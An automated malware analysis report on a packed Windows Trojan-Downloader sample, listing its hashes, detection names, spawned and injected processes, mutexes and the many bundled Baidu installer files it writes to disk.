HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Gen:Variant.Symmi.48377 (B) (Emsisoft), Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: fb19d727263c37bf685e453975c01269
SHA1: 50f32856e588fe9062cf917375ebabefa6c1d532
SHA256: e675ab1c9a5311a2757858be3bc06a3ef72a5076de100ae055787ce245922a32
SSDeep: 12288:MeBy9Zkt/6gHZeAw76sYmhcjeFbgFgHFv:MeBJcg5YSe9lv
Size: 568144 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-09-29 06:32:48
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1308
Baidu.exe:968
Baidu.exe:1836
Baidu.exe:2540
Baidu.exe:3220
YouQian_Setup.exe:1488
The Trojan injects its code into the following process(es):
%original file name%.exe:856
Baidu_Setup_1.6.200.359_ftn_1050103060.exe:492
Baidu.exe:808
Mutexes
The following mutexes were created/opened:
WininetProxyRegistryMutexWininetConnectionMutexWininetStartupMutexc:!documents and settings!adm!local settings!history!history.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!temporary internet files!content.ie5!_!MSFTHISTORY!_ZonesLockedCacheCounterMutexZonesCounterMutexZonesCacheCounterMutexRasPbFileShimCacheMutex
File activity
The process %original file name%.exe:856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EDTTN6HH\7gj1[1] (991986 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F6HGJOR7\7b1[1] (353734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EDTTN6HH\Baidu_Setup_1.6.200.359_ftn_1050103060[1].exe (688653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F6HGJOR7\2k[1] (205033 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EDTTN6HH\uc1[1] (984448 bytes)
The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%WinDir%\Temp\baidu\youqian\æ¡Œé¢百度\process.cfg (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa2.tmp (284894 bytes)
%WinDir%\Temp\baidu\youqian\æ¡Œé¢百度\YouQian_Setup.exe (25112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%WinDir%\Temp\baidu\youqian\æ¡Œé¢百度\æ¡Œé¢百度.ini (1607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\BDMSkin.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\InstallHelper.dll (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%WinDir%\Temp\baidu\youqian\æ¡Œé¢百度\132.exe (172202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp (0 bytes)
The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:492 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_x.png (89 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm5.tmp (447624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\349.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Base.dll (77808 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\Software.pb (9984 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxin.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\iconall-1.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\arrow.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\Utils.dll (23296 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\haze.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\executor.xml (233 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-error.html (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\login\login.html (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-logo57x65.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\InstallHelper.dll (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Update.dll (11040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F6HGJOR7\bdzc_Setup_2.0.3.124[1].dll (18424 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-center-left.png (130 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\PluginSetup.xml (654 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\storm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\msgconfig.pb (142 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\icon_xinwen.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-center-right.png (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\msvcr100.dll (25824 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\foggy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\login_mods.js (14 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sleet.png (741 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\enter.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\skinres.rdb (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\pack.bat (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\weixinUI.xml (345 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\request.js (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-storm.png (926 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\download-hover.png (985 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\app-error.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\uninst.exe (18640 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks_z.png (7 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-rain.png (864 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\BDWebDownload.dll (7192 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\executor.xml (310 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\icon_gupiao.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sandstorm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\PluginSetup.xml (625 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo57x65.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\crash.html (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\skinres.rdb (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\PluginSetup.xml (612 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\overcast.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\shower.png (817 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\icon_yinyue.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.woff (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-google.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\mod.js (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\foggy.png (663 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_m.png (124 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\kuaidi.png (312 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\res_jietu.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\dust.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\res_weixin.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\default-icon.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dy.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\Base.dll (38904 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Protocol.dll (24048 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\msvcr100.dll (51648 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\executor.xml (172 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\advance.png (377 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\44.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_up.png (154 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\icon_bianqian.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\PluginSetup.xml (612 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\344.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\respond.min.js (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_m.png (925 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe (13168 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\icon-circle-loading.gif (9 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder.png (276 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\404.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\vedio_play.png (465 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\res_yinyue.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\main.js (1552 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\jietuDll.dll (3312 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AssociateWnd.rdb (1568 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\UIHandler.dll (120372 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-loading.gif (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\banner.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\gupiaoUI.xml (336 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-unchecked.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-search-large.png (408 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\history_mods.js (6360 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower-with-hail.png (946 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\png8-ala.png (561 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\jietuUI.xml (347 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\Update.rdb (6624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\layout.css (11 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\severe-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\settings_mods.js (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\DD_belatedPNG_0.0.8a-min.js (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-left.png (194 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianUI.xml (346 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-search.png (382 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\qq.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-rain.png (963 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\executor.xml (241 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\screensnapshot.exe (20624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\shower.png (481 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\super-ajax.js (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\download.png (991 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\xinwenUI.xml (342 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUI.xml (382 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\box-shadow.css (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\res_resou.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-close.png (170 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\366.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\snow-flurry.png (479 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\PluginMgr.dll (49664 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LogicMisc.dll (140990 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\server-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-textbox.png (588 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\msvcp100.dll (28368 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\icon-alert-ok.png (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\dy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\png8-ex.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\resouUI.xml (340 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\aladdin.html (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\auto_complete\top_site.db (10128 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox-active.png (893 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history.css (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-left.png (249 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\map.js (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\executor.xml (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\msvcp100.dll (14184 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\yinyueUI.xml (358 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\png8-iconall-1.png (197 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\gz.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery-ui-1.10.4.custom.min.js (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\login-success.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\res\js\common.js (990 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\login.css (7 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\res_xinwen.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\1px.png (947 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\363.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo_blank.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\music_play.png (155 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sunny.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\PluginSetup.xml (622 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings.css (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-right.png (259 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-center.png (143 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general-png8.png (841 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\res_bianqian.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\skinres.rdb (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\new.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery-1.11.1.min.js (3312 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\gray1px.png (918 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download-hover.png (177 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\iconall.gif (94 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\json2.js (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\privacy.png (296 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ice-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\PWidgetAppCommonBase.dll (14384 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\rpt.dat (222 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\login_z.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\MsgPush.dll (31072 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\iframe_loading.gif (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\input.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\favicon.ico (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-checkbox-unchecked.png (361 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\testIO.exe (784 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\AppHTMLXinWen.xml (442 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\Setting.rdb (3712 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\snow-storm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\icon_jietu.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\appBlackList.dat (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\executor.xml (234 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BDSearchBar.rdb (6624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\bookmarks.html (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\global.js (8184 bytes)
